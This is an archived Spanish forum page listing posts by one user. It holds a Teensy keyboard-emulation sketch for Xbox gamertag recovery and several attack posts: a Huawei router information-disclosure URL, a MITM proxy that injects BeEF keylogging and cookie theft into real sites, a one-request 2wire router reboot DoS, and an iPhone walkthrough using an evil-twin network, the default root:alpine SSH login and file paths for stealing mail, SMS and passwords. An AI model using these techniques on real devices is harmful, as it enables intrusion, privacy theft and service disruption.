Últimos Temas de: hkm

Mostrar Temas
Páginas: 1 [2]

Informática / Electrónica / XBOX360 Gamertag Recovery con Teensy 2.0

en: 7 Julio 2010, 16:45 pm

En XBOX existen los Gamer Points. Son una especie de retos que te asignan un puntaje a tu cuenta de Xbox Live. Algunos gamers coleccionan estos puntos, incluso hay algunos que juegan todos los juegos solamente por los puntos. Pero existe un inconveniente...

Si estas en casa de un amigo y quieres acumular estos puntos necesitas "Recuperar tu Gamertag" que es descargar tu perfil en la consola de tu amigo. Este es un proceso lento y si no tienes un teclado USB conectado a tu Xbox es aun mas tardado ya que tienes que introducir letra por letra tu email, password y cuenta de Xbox Live.

Utilizando el controlador Teensy 2.0 se puede emular un teclado y ponerle un programa que envie toda la informacion necesaria en el momento adecuado. Este dispositivo es muy peque~o, del tama~o de una memoria USB y se conecta al Xbox por USB.

En la siguiente liga hay un VIDEO que muestra su uso:

http://hakim.ws/teensy/xbox360_gamertag_recovery/

Utilizando el Teensyduino para programarlo como emulador de teclado usb se puede utilizar el siguiente codigo para realizar la recuperacion automatica del gamertag. Unicamente es necesario cambiar GAMERTAG, EMAIL@DDRESS, y PASSWORD:

Código:

// XBOX360 Gamertag Recovery using Teensy 2.0
// hkm @ hakim.ws
// http://hakim.ws/teensy/xbox360_gamertag_recovery/
//
// JUST REPLACE FOLLOWING STRINGS:
char gamertag[] = "GAMERTAG";
char email[] = "EMAIL@DDRESS";
char pass[] = "PASSWORD";
// END REPLACE - Done
// Plug before Gamertag field selection


int ledPin = 11;

void setup() {
 pinMode(ledPin, OUTPUT);
}

void loop(){
  delay(3000);
  Enter(); //select Gamertag
  delay(3000);
  CommandAtXbox(gamertag); //send Gamertag
  delay(1000);
  Enter(); //select Done
  delay(5000);
  Enter(); //select Continue
  delay(4000);
  CommandAtXbox(email); //send Email address
  delay(1000);
  Enter(); //select Done
  delay(5000);
  CommandAtXbox(pass); //send Password
  Enter(); //select Sign in
  delay(13000);
  Up();
  Enter(); //select Accept
  while (1)
    delay(20000); //END (you should remove it now)
}

void CommandAtXbox(char  *SomeCommand){ //from irongeek
 digitalWrite(ledPin, HIGH); // set the LED on
 Keyboard.set_modifier(0); //prep release of control keys
 Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
 Keyboard.send_now(); //Send the key changes
 delay(1000);
 Keyboard.print(SomeCommand);
 Keyboard.set_key1(KEY_ENTER);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 digitalWrite(ledPin, LOW); // set the LED off
}

void Enter(){
 delay(1000);
 digitalWrite(ledPin, HIGH); // set the LED on
 Keyboard.set_modifier(0); //prep release of control keys
 Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
 Keyboard.send_now(); //Send the key changes
 delay(500);
 Keyboard.set_key1(KEY_ENTER);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 digitalWrite(ledPin, LOW); // set the LED off
}

void Up(){
 digitalWrite(ledPin, HIGH); // set the LED on
 Keyboard.set_modifier(0); //prep release of control keys
 Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
 Keyboard.send_now(); //Send the key changes
 delay(500);
 Keyboard.set_key1(KEY_UP);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 digitalWrite(ledPin, LOW); // set the LED off
}

Saludos,

hkm

12	Seguridad Informática / Bugs y Exploits / Huawei EchoLife HG520c Revelacion de Informacion	en: 2 Junio 2010, 21:40 pm
============================================== HUAWEI ECHOLIFE HG520c Revelacion de Informacion ============================================== Dispositivo: EchoLife HG520c Version de Software: V100R001B021Telmex V100R001B020Telmex Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version) 3.10.18.5-1.0.7.0 Modelos Vulnerables: HG520c Fecha de publicacion: 2010-05-16 Criticidad: Bajo Impacto: Revelacion de informacion Donde: En la interfaz de administracion web (LAN/WAN) Solucion: No existe solucion disponible en este momento [Descripcion] ================= La pagina '/Listadeparametros.html' muestra informacion sensible como la version del software, la IP interna y el nombre de la red inalambrica. No se necesita autenticacion para abrir esta pagina. [Exploit] ================= Desde la LAN o por algun ataque Client-Side se puede abrir la pagina '/Listadeparametros.html': http://192.168.1.254/Listadeparametros.html De forma remota, en caso de tener la interfaz web habilitada en la WAN: http://<IP REMOTA>/Listadeparametros.html hkm hkm@hakim.ws http://websec.mx/advisories/view/Huawei_HG520c_Revelacion_de_Informacion_via_web

13	Seguridad Informática / Abril negro / [!] BeEFYPROXY - MITM Web con modificacion de contenido	en: 24 Abril 2009, 09:17 am
== BeEFYPROXY == hkm @ hakim.ws == http://www.hakim.ws/software/beefyproxy/ BeEFYPROXY es la unión de dos scripts que juntos permiten interceptar y re-enviar contenido modificado de sitios verdaderos aparentando ser el sitio original. Se requiere de apuntar los dominios al IP donde esta hosteado BeEFYPROXY.BeEFYPROXY esta diseñado para correr en un hosting dedicado para que la dirección IP muestre la pagina default de BeEFYPROXY.Se recibe una conexión a la dirección IP y el script toma el valor de la cabecera Host y obtiene la pagina del Host verdadero y agrega el script del cliente BeEF. == Instalación == Descomprime el contenido de beefproxy en / Apunta cualquier dominio a la IP donde esta hosteado BeEFYPROXY y este se conecta al Host indicado, obtiene la pagina real, le agrega el script de BeEF y muestra el contenido al usuario como si fuera la pagina del dominio verdadero. == Funciones == MITM con modificación de contenido Redirige el contenido actual del dominio verdadero Agrega el Framework BeEF (accesible en /beef.php) que incluye: -Keylog en tiempo real -Almacena Cookies, Keylog y HTML en /cache (ver por ftp) -muchas mas funciones (ver http://www.bindshell.net/tools/beef) == Como esta hecho? == Junte BeEF (http://www.bindshell.net/tools/beef) y PHProxy (http://sourceforge.net/projects/poxy) en un solo archivo. Cambie de nombre el index.php de BeEF por beef.php y puse el index.php de PHProxy modificado.En PHProxy cambie la variable $_url_form (ln 1142) que era la barra de navegación del proxy por el url default del script de BeEF: /hook/beefmagic.js.php y le modifique su label al principio del archivo.Tambien agrege en la ln 417 una función para que cuando se recibe una petición sin variable 'q' por GET, se tome como url default el Host con el que se hace la petición. == Greets == lightos, octalh, sdc, alt3kx, optix, crypkey, xianuro, nitrous, mendozaaaa. -- BeEFYPROXY por hkm -- DESCARGA Y VIDEO: http://www.hakim.ws/software/beefyproxy/ http://www.milw0rm.com/video/watch.php?id=99

14	Seguridad Informática / Nivel Web / [UP][°] Denegación de servicio en routers 2wire %25	en: 7 Abril 2008, 07:51 am
Existe otra vulnerabilidad en la interfaz de configuracion web de los 2wire que permite reiniciar los ruteadores con solo hacer una peticion a: Código: http://gateway.2wire.net/xslt?page=%25 http://192.168.1.254/xslt?page=%25 http://home/xslt?page=%25 Para reiniciar el ruteador da click aqui. Saludos a los mods! hkm mas info: http://www.hakim.ws/2wire/x25dos.html

15	Comunicaciones / Hacking Mobile / Aprovechar y solucionar bug con comando passwd en Iphones 1.1.3	en: 24 Febrero 2008, 06:34 am
Premisas: Iphone con OpenSSH con password default y redes preferentes abiertas. Fingiremos que somos un access point conocido para conectarnos y usar la cuenta default de OpenSSH. La mayoria de los iphones liberados por software tienen OpenSSH instalado pues se usa para ejecutar comandos en el telefono y es el metodo mas comun para transferir archivos ademas de que es la base para correr otros programas. En la ultima version del firmware del iphone (1.1.3) existen varios bugs con OpenSSH: -no es facil cambiar la contrasena (no se puede usar passwd) -no aparece el icono de OpenSSH -algunas veces no se puede desinstalar desde el Installer 1) Usando airodump podemos ver las redes preferentes a las que se conecta. 2) Usando la tecnica de Evil Twin / Access Point Falso podemos hacer que se conecte a nosotros. 3) Con un sniffer o desde la interfaz del router podemos conocer su IP. 4) Nos conectamos con cualquier cliente SSH y ponemos la cuenta default: root:alpine 5) Somos root asi que podemos hacer cualquier cosa (talvez instalar un troyano que reenvie SMS?) Aqui algunos files interesantes: Código: Fotos: /private/var/mobile/Media/DCIM/100APPLE Ver correos: cat /private/var/mobile/Library/Mail/Envelope\ Index Vet notas: cat /private/var/mobile/Library/Notes/notes.db Sacar passwords del messenger: cat /private/var/mobile/Library/Preferences/MSN.plist el hosts: /private/var/mobile/Library/Preferences/hosts SMS: /private/var/mobile/Library/SMS Contactos: /private/var/mobile/Library/AddressBook Limitaciones del ataque: -Necesita tener password por default, -Redes preferentes abiertas, -Cuando el telefono esta bloqueado el wifi esta apagado, asi que el script tiene poco tiempo para operar xD - [Como cambiar el password default sin usar el comando passwd]* Puedes usar alguno de estos metodos, el primero me funciono bien: [cypt(3) y vi /etc/master.passwd] Ve a http://javascript.internet.com/passwords/unix-crypt(3)-encryption.html Escribe tu password y da click en "Encrypt password" y usa de salt "/s". Edita /etc/master.passwd con vi para cambiar el password. [SSH-pass.app] Run http://winandmac.com/files/SSH-pass.zip y luego cambia el password. hkm

Páginas: 1 [2]